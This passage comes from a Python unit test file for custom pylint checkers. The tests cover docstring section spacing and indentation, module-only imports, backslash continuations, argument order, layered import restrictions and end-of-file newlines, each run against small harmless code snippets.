self.checker_test_object.checker.visit_functiondef(
node_no_newline_at_end)
def test_no_newline_above_args(self):
node_single_newline_above_args = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Do something.
Args:
arg: argument. Description.
\"\"\"
""")
message = testutils.Message(
msg_id='single-space-above-args',
node=node_single_newline_above_args)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_single_newline_above_args)
def test_no_newline_above_raises(self):
node_single_newline_above_raises = astroid.extract_node(
u"""def func(): #@
\"\"\"Raises exception.
Raises:
raises_exception. Description.
\"\"\"
raise exception
""")
message = testutils.Message(
msg_id='single-space-above-raises',
node=node_single_newline_above_raises
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_single_newline_above_raises)
def test_no_newline_above_return(self):
node_with_no_space_above_return = astroid.extract_node(
u"""def func(): #@
\"\"\"Returns something.
Returns:
returns_something. Description.
\"\"\"
return something
""")
message = testutils.Message(
msg_id='single-space-above-returns',
node=node_with_no_space_above_return
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_with_no_space_above_return)
def test_varying_combination_of_newline_above_args(self):
node_newline_above_args_raises = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Raises exception.
Args:
arg: argument. Description.
Raises:
raises_something. Description.
\"\"\"
raise exception
""")
message = testutils.Message(
msg_id='single-space-above-raises',
node=node_newline_above_args_raises
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_newline_above_args_raises)
node_newline_above_args_returns = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns Something.
Args:
arg: argument. Description.
Returns:
returns_something. Description.
\"\"\"
return something
""")
message = testutils.Message(
msg_id='single-space-above-returns',
node=node_newline_above_args_returns
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_newline_above_args_returns)
node_newline_above_returns_raises = astroid.extract_node(
u"""def func(): #@
\"\"\"Do something.
Raises:
raises_exception. Description.
Returns:
returns_something. Description.
\"\"\"
raise something
return something
""")
message = testutils.Message(
msg_id='single-space-above-raises',
node=node_newline_above_returns_raises
)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
node_newline_above_returns_raises)
def test_excessive_newline_above_args(self):
node_with_two_newline = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns something.
Args:
arg: argument. This is description.
Returns:
int. Returns something.
Yields:
yield_something. Description.
\"\"\"
return True
yield something
""")
single_space_above_args_message = testutils.Message(
msg_id='single-space-above-args',
node=node_with_two_newline
)
single_space_above_returns_message = testutils.Message(
msg_id='single-space-above-returns',
node=node_with_two_newline
)
single_space_above_yields_message = testutils.Message(
msg_id='single-space-above-yield',
node=node_with_two_newline
)
with self.checker_test_object.assertAddsMessages(
single_space_above_args_message, single_space_above_returns_message,
single_space_above_yields_message):
self.checker_test_object.checker.visit_functiondef(
node_with_two_newline)
def test_return_in_comment(self):
node_with_return_in_comment = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns something.
Args:
arg: argument. Description.
Returns:
returns_something. Description.
\"\"\"
"Returns: something"
return something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_return_in_comment)
def test_function_with_no_args(self):
node_with_no_args = astroid.extract_node(
u"""def func():
\"\"\"Do something.\"\"\"
a = 1 + 2
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_args)
def test_well_placed_newline(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"Returns something.
Args:
arg: argument. This is description.
Returns:
returns_something. This is description.
Raises:
raises. Something.
Yields:
yield_something. This is description.
\"\"\"
raise something
yield something
return something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_invalid_parameter_indentation_in_docstring(self):
raises_invalid_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
NoVariableException. Variable.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=raises_invalid_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
raises_invalid_indentation_node)
return_invalid_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Returns:
str. If :true,
individual key=value pairs.
\"\"\"
Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=return_invalid_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
return_invalid_indentation_node)
def test_invalid_description_indentation_docstring(self):
invalid_raises_description_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
AssertionError. If the
schema is not valid.
\"\"\"
Something
""")
incorrect_indentation_message = testutils.Message(
msg_id='8-space-indentation-in-docstring',
node=invalid_raises_description_indentation_node)
malformed_raises_message = testutils.Message(
msg_id='malformed-raises-section',
node=invalid_raises_description_indentation_node)
with self.checker_test_object.assertAddsMessages(
incorrect_indentation_message, malformed_raises_message,
malformed_raises_message):
self.checker_test_object.checker.visit_functiondef(
invalid_raises_description_indentation_node)
invalid_return_description_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Returns:
str. If :true,
individual key=value pairs.
\"\"\"
return Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=invalid_return_description_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
invalid_return_description_indentation_node)
invalid_yield_description_indentation_node = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Yields:
str. If :true,
incorrent indentation line.
\"\"\"
yield Something
""")
message = testutils.Message(
msg_id='4-space-indentation-in-docstring',
node=invalid_yield_description_indentation_node)
with self.checker_test_object.assertAddsMessages(message):
self.checker_test_object.checker.visit_functiondef(
invalid_yield_description_indentation_node)
def test_malformed_parameter_docstring(self):
invalid_parameter_name = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
Incorrect-Exception. If the
schema is not valid.
\"\"\"
Something
""")
malformed_raises_message = testutils.Message(
msg_id='malformed-raises-section',
node=invalid_parameter_name)
with self.checker_test_object.assertAddsMessages(
malformed_raises_message, malformed_raises_message):
self.checker_test_object.checker.visit_functiondef(
invalid_parameter_name)
def test_well_formed_single_line_docstring(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_well_formed_multi_line_docstring(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
arg: variable. Description.
\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_well_formed_multi_line_description_docstring(self):
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Args:
arg: bool. If true, individual key=value
pairs separated by '&' are
generated for each element of the value
sequence for the key.
\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Raises:
doseq. If true, individual
key=value pairs separated by '&' are
generated for each element of
the value sequence for the key
temp temp temp temp.
query. The query to be encoded.
\"\"\"
Something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
node_with_no_error_message = astroid.extract_node(
u"""def func(arg):
\"\"\"This is a docstring.
Returns:
str. The string parsed using
Jinja templating. Returns an error
string in case of error in parsing.
Yields:
tuple. For ExplorationStatsModel,
a 2-tuple of the form (exp_id, value)
where value is of the form.
\"\"\"
if True:
return Something
else:
yield something
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
node_with_no_error_message = astroid.extract_node(
u"""def func(arg): #@
\"\"\"This is a docstring.
Returns:
str. From this item there
is things:
Jinja templating. Returns an error
string in case of error in parsing.
Yields:
tuple. For ExplorationStatsModel:
{key
(sym)
}.
\"\"\"
if True:
return Something
else:
yield (a, b)
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
node_with_no_error_message)
def test_checks_args_formatting_docstring(self):
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
invalid_args_description_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Incorrect description indentation
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='8-space-indentation-for-arg-in-descriptions-doc',
node=invalid_args_description_node,
args='Incorrect'
),
testutils.Message(
msg_id='malformed-args-section',
node=invalid_args_description_node,
)
):
self.checker_test_object.checker.visit_functiondef(
invalid_args_description_node)
invalid_param_indentation_node = astroid.extract_node(
"""
def func(test_var_one): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='4-space-indentation-for-arg-parameters-doc',
node=invalid_param_indentation_node,
args='test_var_one:'
),
):
self.checker_test_object.checker.visit_functiondef(
invalid_param_indentation_node)
invalid_header_indentation_node = astroid.extract_node(
"""
def func(test_var_one): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='incorrect-indentation-for-arg-header-doc',
node=invalid_header_indentation_node,
),
):
self.checker_test_object.checker.visit_functiondef(
invalid_header_indentation_node)
def test_correct_args_formatting_docstring(self):
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
valid_free_form_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable:
Incorrect description indentation
{
key:
}.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
valid_free_form_node)
valid_indentation_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable:
Correct indentaion.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(
valid_indentation_node)
def test_finds_docstring_parameter(self):
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.DocstringParameterChecker)
self.checker_test_object.setup_method()
valid_func_node, valid_return_node = astroid.extract_node(
"""
def test(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(valid_func_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_return_node)
valid_func_node, valid_yield_node = astroid.extract_node(
"""
def test(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.\"\"\"
result = test_var_one + test_var_two
yield result #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_functiondef(valid_func_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_yield(valid_yield_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_yield_node)
(
missing_yield_type_func_node,
missing_yield_type_yield_node) = astroid.extract_node(
"""
class Test(python_utils.OBJECT):
def __init__(self, test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
yield result #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='redundant-returns-doc',
node=missing_yield_type_func_node
),
):
self.checker_test_object.checker.visit_functiondef(
missing_yield_type_func_node)
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-yield-doc',
node=missing_yield_type_func_node
), testutils.Message(
msg_id='missing-yield-type-doc',
node=missing_yield_type_func_node
),
):
self.checker_test_object.checker.visit_yieldfrom(
missing_yield_type_yield_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(
missing_yield_type_yield_node)
(
missing_return_type_func_node,
missing_return_type_return_node) = astroid.extract_node(
"""
class Test(python_utils.OBJECT):
def __init__(self, test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Yields:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='redundant-yields-doc',
node=missing_return_type_func_node
),
):
self.checker_test_object.checker.visit_functiondef(
missing_return_type_func_node)
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-return-doc',
node=missing_return_type_func_node
), testutils.Message(
msg_id='missing-return-type-doc',
node=missing_return_type_func_node
),
):
self.checker_test_object.checker.visit_return(
missing_return_type_return_node)
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_yield(
missing_return_type_return_node)
valid_raise_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two):
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Raises:
Exception. An exception.
\"\"\"
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
(
missing_raise_type_func_node,
missing_raise_type_raise_node) = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test raising exceptions.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
\"\"\"
raise Exception #@
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-raises-doc',
args=('Exception',),
node=missing_raise_type_func_node
),
):
self.checker_test_object.checker.visit_raise(
missing_raise_type_raise_node)
valid_raise_node = astroid.extract_node(
"""
class Test(python_utils.OBJECT):
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
class Test():
@property
def decorator_func(self):
pass
@decorator_func.setter
@property
def func(self):
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
class Test():
def func(self):
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def func():
try:
raise Exception #@
except Exception:
pass
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def func():
\"\"\"Function to test raising exceptions.\"\"\"
raise Exception #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def my_func(self):
\"\"\"This is a docstring.
:raises NameError: Never.
\"\"\"
def ex_func(val):
return RuntimeError(val)
raise ex_func('hi') #@
raise NameError('hi')
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
from unknown import Unknown
def my_func(self):
\"\"\"This is a docstring.
:raises NameError: Never.
\"\"\"
raise Unknown('hi') #@
raise NameError('hi')
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_raise_node = astroid.extract_node(
"""
def my_func(self):
\"\"\"This is a docstring.
:raises NameError: Never.
\"\"\"
def ex_func(val):
def inner_func(value):
return OSError(value)
return RuntimeError(val)
raise ex_func('hi') #@
raise NameError('hi')
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_raise(valid_raise_node)
valid_return_node = astroid.extract_node(
"""
def func():
\"\"\"Function to test return values.\"\"\"
return None #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_return_node)
valid_return_node = astroid.extract_node(
"""
def func():
\"\"\"Function to test return values.\"\"\"
return #@
""")
with self.checker_test_object.assertNoMessages():
self.checker_test_object.checker.visit_return(valid_return_node)
missing_param_func_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two, *args, **kwargs): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-param-doc',
node=missing_param_func_node,
args=('args, kwargs',),
),
):
self.checker_test_object.checker.visit_functiondef(
missing_param_func_node)
missing_param_func_node = astroid.extract_node(
"""
def func(test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
invalid_var_name: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-param-doc',
node=missing_param_func_node,
args=('test_var_two',),
), testutils.Message(
msg_id='missing-type-doc',
node=missing_param_func_node,
args=('test_var_two',),
), testutils.Message(
msg_id='differing-param-doc',
node=missing_param_func_node,
args=('invalid_var_name',),
), testutils.Message(
msg_id='differing-type-doc',
node=missing_param_func_node,
args=('invalid_var_name',),
),
testutils.Message(
msg_id='8-space-indentation-for-arg-in-descriptions-doc',
node=missing_param_func_node,
args='invalid_var_name:'
),
):
self.checker_test_object.checker.visit_functiondef(
missing_param_func_node)
class_node, multiple_constructor_func_node = astroid.extract_node(
"""
class Test(): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
def __init__(self, test_var_one, test_var_two): #@
\"\"\"Function to test docstring parameters.
Args:
test_var_one: int. First test variable.
test_var_two: str. Second test variable.
Returns:
int. The test result.
\"\"\"
result = test_var_one + test_var_two
return result
""")
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='multiple-constructor-doc',
node=class_node,
args=(class_node.name,),
),
):
self.checker_test_object.checker.visit_functiondef(
multiple_constructor_func_node)
def test_visit_raise_warns_unknown_style(self):
self.checker_test_object.checker.config.accept_no_raise_doc = False
node = astroid.extract_node(
"""
def my_func(self):
\"\"\"This is a docstring.\"\"\"
raise RuntimeError('hi')
""")
raise_node = node.body[0]
func_node = raise_node.frame()
with self.checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='missing-raises-doc',
args=('RuntimeError',),
node=func_node
),
):
self.checker_test_object.checker.visit_raise(raise_node)
class ImportOnlyModulesCheckerTests(unittest.TestCase):
def test_finds_import_from(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.ImportOnlyModulesChecker)
checker_test_object.setup_method()
importfrom_node1 = astroid.extract_node(
"""
from os import path #@
import sys
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node1)
importfrom_node2 = astroid.extract_node(
"""
from os import error #@
import sys
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='import-only-modules',
node=importfrom_node2,
args=('error', 'os')
),
):
checker_test_object.checker.visit_importfrom(
importfrom_node2)
importfrom_node3 = astroid.extract_node(
"""
from invalid_module import invalid_module #@
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node3)
importfrom_node4 = astroid.extract_node(
"""
from constants import constants #@
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node4)
importfrom_node5 = astroid.extract_node(
"""
from os import invalid_module #@
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='import-only-modules',
node=importfrom_node5,
args=('invalid_module', 'os')
),
):
checker_test_object.checker.visit_importfrom(importfrom_node5)
importfrom_node6 = astroid.extract_node(
"""
from .constants import constants #@
""", module_name='.constants')
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(importfrom_node6)
class BackslashContinuationCheckerTests(unittest.TestCase):
def test_finds_backslash_continuation(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.BackslashContinuationChecker)
checker_test_object.setup_method()
node = astroid.scoped_nodes.Module(name='test', doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""message1 = 'abc'\\\n""" # pylint: disable=backslash-continuation
"""'cde'\\\n""" # pylint: disable=backslash-continuation
"""'xyz'
message2 = 'abc\\\\'
message3 = (
'abc\\\\'
'xyz\\\\'
)
""")
node.file = filename
node.path = filename
checker_test_object.checker.process_module(node)
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='backslash-continuation',
line=1
),
testutils.Message(
msg_id='backslash-continuation',
line=2
),
):
temp_file.close()
class FunctionArgsOrderCheckerTests(unittest.TestCase):
def test_finds_function_def(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.FunctionArgsOrderChecker)
checker_test_object.setup_method()
functiondef_node1 = astroid.extract_node(
"""
def test(self,test_var_one, test_var_two): #@
result = test_var_one + test_var_two
return result
""")
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_functiondef(functiondef_node1)
functiondef_node2 = astroid.extract_node(
"""
def test(test_var_one, test_var_two, self): #@
result = test_var_one + test_var_two
return result
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='function-args-order-self',
node=functiondef_node2
),
):
checker_test_object.checker.visit_functiondef(functiondef_node2)
functiondef_node3 = astroid.extract_node(
"""
def test(test_var_one, test_var_two, cls): #@
result = test_var_one + test_var_two
return result
""")
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='function-args-order-cls',
node=functiondef_node3
),
):
checker_test_object.checker.visit_functiondef(functiondef_node3)
class RestrictedImportCheckerTests(unittest.TestCase):
def test_detect_restricted_import(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.RestrictedImportChecker)
checker_test_object.setup_method()
# Tests the case wherein storage layer imports domain layer
# in import statements.
node_err_import = astroid.extract_node(
"""
import core.domain.activity_domain #@
""")
node_err_import.root().name = 'oppia.core.storage.topic'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_import,
args=('domain', 'storage'),
),
):
checker_test_object.checker.visit_import(node_err_import)
# Tests the case wherein storage layer does not import domain layer
# in import statements.
node_no_err_import = astroid.extract_node(
"""
import core.platform.email.mailgun_email_services #@
""")
node_no_err_import.root().name = 'oppia.core.storage.topic'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_import(node_no_err_import)
# Tests the case wherein storage layer imports domain layer
# in import-from statements.
node_err_importfrom = astroid.extract_node(
"""
from core.domain import activity_domain #@
""")
node_err_importfrom.root().name = 'oppia.core.storage.topic'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_importfrom,
args=('domain', 'storage'),
)
):
checker_test_object.checker.visit_importfrom(node_err_importfrom)
# Tests the case wherein storage layer does not import domain layer
# in import-from statements.
node_no_err_importfrom = astroid.extract_node(
"""
from core.platform.email import mailgun_email_services #@
""")
node_no_err_importfrom.root().name = 'oppia.core.storage.topicl'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(node_no_err_importfrom)
# Tests the case wherein domain layer imports controller layer
# in import statements.
node_err_import = astroid.extract_node(
"""
import core.controllers.acl_decorators #@
""")
node_err_import.root().name = 'oppia.core.domain'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_import,
args=('controller', 'domain'),
),
):
checker_test_object.checker.visit_import(node_err_import)
# Tests the case wherein domain layer does not import controller layer
# in import statements.
node_no_err_import = astroid.extract_node(
"""
import core.platform.email.mailgun_email_services_test #@
""")
node_no_err_import.root().name = 'oppia.core.domain'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_import(node_no_err_import)
# Tests the case wherein domain layer imports controller layer
# in import-from statements.
node_err_importfrom = astroid.extract_node(
"""
from core.controllers import acl_decorators #@
""")
node_err_importfrom.root().name = 'oppia.core.domain'
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='invalid-import',
node=node_err_importfrom,
args=('controller', 'domain'),
)
):
checker_test_object.checker.visit_importfrom(node_err_importfrom)
# Tests the case wherein domain layer does not import controller layer
# in import-from statements.
node_no_err_importfrom = astroid.extract_node(
"""
from core.platform.email import mailgun_email_services_test #@
""")
node_no_err_importfrom.root().name = 'oppia.core.domain'
with checker_test_object.assertNoMessages():
checker_test_object.checker.visit_importfrom(node_no_err_importfrom)
class SingleCharAndNewlineAtEOFCheckerTests(unittest.TestCase):
def test_checks_single_char_and_newline_eof(self):
checker_test_object = testutils.CheckerTestCase()
checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleCharAndNewlineAtEOFChecker)
checker_test_object.setup_method()
node_missing_newline_at_eof = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""c = 'something dummy'
""")
node_missing_newline_at_eof.file = filename
node_missing_newline_at_eof.path = filename
checker_test_object.checker.process_module(node_missing_newline_at_eof)
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='newline-at-eof',
line=2
),
):
temp_file.close()
node_single_char_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(u"""1""")
node_single_char_file.file = filename
node_single_char_file.path = filename
checker_test_object.checker.process_module(node_single_char_file)
with checker_test_object.assertAddsMessages(
testutils.Message(
msg_id='only-one-character',
line=1
),
):
temp_file.close()
node_with_no_error_message = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(u"""x = 'something dummy'""")
node_with_no_error_message.file = filename
node_with_no_error_message.path = filename
checker_test_object.checker.process_module(node_with_no_error_message)
with checker_test_object.assertNoMessages():
temp_file.close()
class SingleSpaceAfterYieldTests(unittest.TestCase):
def setUp(self):
super(SingleSpaceAfterYieldTests, self).setUp()
self.checker_test_object = testutils.CheckerTestCase()
self.checker_test_object.CHECKER_CLASS = (
pylint_extensions.SingleSpaceAfterYieldChecker)
self.checker_test_object.setup_method()
def test_well_formed_yield_statement_on_single_line(self):
node_well_formed_one_line_yield_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
\"\"\"Below is the yield statement.\"\"\"
yield (5, 2)
""")
node_well_formed_one_line_yield_file.file = filename
node_well_formed_one_line_yield_file.path = filename
node_well_formed_one_line_yield_file.fromlineno = 3
self.checker_test_object.checker.visit_yield(
node_well_formed_one_line_yield_file)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_well_formed_yield_statement_on_multiple_lines(self):
node_well_formed_mult_lines_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield (
'This line was too long to be put on one line.')
""")
node_well_formed_mult_lines_file.file = filename
node_well_formed_mult_lines_file.path = filename
node_well_formed_mult_lines_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
node_well_formed_mult_lines_file)
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_yield_nothing(self):
yield_nothing_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
yield
""")
yield_nothing_file.file = filename
yield_nothing_file.path = filename
yield_nothing_file.fromlineno = 2
self.checker_test_object.checker.visit_yield(
yield_nothing_file)
# No errors on yield statements that do nothing.
with self.checker_test_object.assertNoMessages():
temp_file.close()
def test_yield_in_multi_line_comment(self):
yield_in_multiline_file = astroid.scoped_nodes.Module(
name='test',
doc='Custom test')
temp_file = tempfile.NamedTemporaryFile()
filename = temp_file.name
with python_utils.open_file(filename, 'w') as tmp:
tmp.write(
u"""def helloworld():
\"\"\"
yield(\"invalid yield format\")
\"\"\"
extract_node(\"\"\"
yield (invalid)
\"\"\")
extract_node(
b\"\"\"
yield(1, 2)
\"\"\")
extract_node(
u\"\"\"
yield(3, 4)
\"\"\")
)
""")
yield_in_multiline_file.file = filename
yield_in_multiline_file.path = filename
